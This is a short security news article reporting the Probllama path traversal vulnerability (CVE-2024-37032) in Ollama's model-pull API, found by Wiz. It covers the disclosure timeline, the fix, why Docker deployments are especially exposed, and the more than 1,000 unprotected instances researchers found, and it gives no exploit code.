In the code of the open source AI platform Ollama, a bug was discovered and fixed, called Probllama. This issue could be used for remote code execution.
The CVE-2024-37032 or Probllama vulnerability was found by Wiz specialists. Researchers reported the bug to developers on May 5, 2024, and the problem was fixed in version 0.1.34released May 7, 2024.
Ollama is a popular tool for packaging, deploying, and running large language models (LLMs) locally on Windows, Linux, and macOS devices.
According to the researchers, the discovered vulnerability was due to insufficient input validation, which led to path traversal, and as a result, the attacker could overwrite arbitrary files on the server, which ultimately led to remote code execution.
To successfully exploit the bug, the attacker needed to send specially prepared HTTP requests to the Ollama API server. Specifically, the vulnerability exploited the /api/pull API endpoint (used to pull models from an official registry or private repository) to pass a malicious manifest file containing a path traversal payload in the digest field.
It is noted that the problem could be used not only to corrupt arbitrary files on the system, but also to perform remote code execution by overwriting the configuration file (etc/ld.so.preload) associated with the dynamic linker (ld.so) to include malicious shared library and then running this library before executing any program.
And while in standard Linux installations the risk of remote code execution is reduced by the fact that the API server is bound to localhost, in Docker installations where the API server is publicly available, everything is much more serious.
“This issue is extremely dangerous in Docker installations because the server runs with root privileges and listens on 0.0.0.0 by default, allowing this vulnerability to be exploited remotely,” the experts wrote.
The situation is aggravated by the lack of authentication inherent in Ollama, which allows attackers to use a publicly accessible server to steal or modify AI models, as well as compromise self-hosted AI inference servers.
Wiz analysts warn that they have already identified more than 1,000 vulnerable instances of Ollama with numerous AI models without any protection.
“CVE-2024-37032 is an easily exploitable RCE that affects modern AI infrastructure. Although the code base is relatively new and written in modern programming languages, classic vulnerabilities, such as path traversal, still remain relevant,” the experts conclude.